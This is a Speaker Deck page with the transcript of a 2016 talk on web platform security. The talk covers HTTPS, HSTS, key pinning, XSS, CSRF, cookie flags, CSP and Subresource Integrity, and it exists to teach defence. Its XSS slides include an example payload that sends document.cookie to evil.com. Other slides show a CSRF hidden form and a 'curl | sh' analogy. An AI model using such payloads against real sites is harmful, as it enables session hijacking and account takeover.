Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Platform Security
Search
Jérémy Courtial
October 26, 2016
Programming
0
47
Web Platform Security
Jérémy Courtial
October 26, 2016
Tweet
Share
More Decks by Jérémy Courtial
See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
25
An introduction to AppSec?
mrartichaut
0
43
Secure by design: introduction to threat modeling
mrartichaut
0
51
Taming secrets with Vault
mrartichaut
0
83
Lead Tech: Empowering the team
mrartichaut
0
47
go doSomeThing()
mrartichaut
0
52
Practical Cryptography : Data Encryption
mrartichaut
0
61
Practical Cryptography : Password Hashing
mrartichaut
1
73
HTTP/2 : One connection to rule them all
mrartichaut
1
60
Other Decks in Programming
See All in Programming
来たるべき 8.0 に備えて React 19 新機能と React Router 固有機能の取捨選択とすり合わせを考える
oukayuka
2
890
PostgreSQLのRow Level SecurityをPHPのORMで扱う Eloquent vs Doctrine #phpcon #track2
77web
2
490
20250704_教育事業におけるアジャイルなデータ基盤構築
hanon52_
5
400
Deep Dive into ~/.claude/projects
hiragram
11
2.3k
設計やレビューに悩んでいるPHPerに贈る、クリーンなオブジェクト設計の指針たち
panda_program
6
1.8k
AIプログラマーDevinは PHPerの夢を見るか?
shinyasaita
1
190
PicoRuby on Rails
makicamel
2
120
Google Agent Development Kit でLINE Botを作ってみた
ymd65536
2
220
Rubyでやりたい駆動開発 / Ruby driven development
chobishiba
1
550
今ならAmazon ECSのサービス間通信をどう選ぶか / Selection of ECS Interservice Communication 2025
tkikuc
21
3.8k
Webの外へ飛び出せ NativePHPが切り拓くPHPの未来
takuyakatsusa
2
470
PHPでWebSocketサーバーを実装しよう2025
kubotak
0
260
Featured
See All Featured
Keith and Marios Guide to Fast Websites
keithpitt
411
22k
Producing Creativity
orderedlist
PRO
346
40k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
7
730
Designing for humans not robots
tammielis
253
25k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
For a Future-Friendly Web
brad_frost
179
9.8k
Product Roadmaps are Hard
iamctodd
PRO
54
11k
Building Adaptive Systems
keathley
43
2.6k
What’s in a name? Adding method to the madness
productmarketing
PRO
23
3.5k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
53
2.8k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
233
17k
Scaling GitHub
holman
459
140k
Transcript
Web Platform Security Leveling up Jérémy Courtial Software Security Architect
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin.
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Rootkit ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Malware ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Trojan ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Browser /ˈbraʊ.zɚ/
http://yolo.com Go!
curl -s http://yolo.com | sh VS http://yolo.com Go!
Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from unknown origin.
Unknown origin
Unknown origin Unsecure
What is anyway ? www.google.com
What is anyway ? www.oodrive.com
What is anyway ? www.lol-cats.com
What is anyway ? 172.217.20.46
Unsecure origin
Unsecure origin
Transport Layer Security
Confidentiality Integrity Authentication
Other incentives "The green lock™"
Other incentives HTTP/2
Other incentives "Secure origins only" features
http https
GET /
GET / 302 Found Location: https://yolo.com
GET / 302 Found Location: https://yolo.com
None
None
302 Found
302 Found
302 Found
HTTP Strict Transport Security
Strict-Transport-Security :
max-age=31536000; Strict-Transport-Security :
includeSubdomains; max-age=31536000; Strict-Transport-Security :
http://yolo.com
http://yolo.com 307 Internal Redirect
https://yolo.com 307 Internal Redirect
307 Internal Redirect GET / https://yolo.com
Trust failure
TLS certificates are based on trust
Oh… trust … That's cute …
Trust-based systems don't have a good reliability record …
Certificate Authority failures Bad captive portal Every "Internal CA"
You've failed me for the last time
HTTP Certificate Pinning
Public-Key-Pins:
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.
Unknown code
XSS <h1>Hello, ${username}</h1>
XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"
XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>
CSRF https://evil.com Click here!
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
Everybody love cookies !
Rename Cookie to Spinach ?
Rename Cookie to Spinach ? Brussel Sprout ?
REJECTED
Locking the cookie jar
Set-Cookie : JSESSIONID=12345;
Set-Cookie : JSESSIONID=12345; secure;
Set-Cookie : JSESSIONID=12345; secure; HttpOnly;
Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;
Content Security Policy
Content-Security-Policy
: default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src
… ; connect-src …; Content-Security-Policy
: … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy
Our data (cookies, assets) are locked. What about third parties
?
HTML JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
Subresource Integrity
<script src="https://example.com/framework.js" > </script>
<script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser unknown code
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser trusted code
Many more Suborigins iframe sandboxing Credentials Management
https://www.w3.org/2011/webappsec/ @mikewest
Times have changed
Times have changed "secured" is the new default secured
What does secured means ? secured Least Privilege Authentication Integrity
Is our platform ? secured
Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,
unlimicon (The Noun Project) and design.google.com/icons/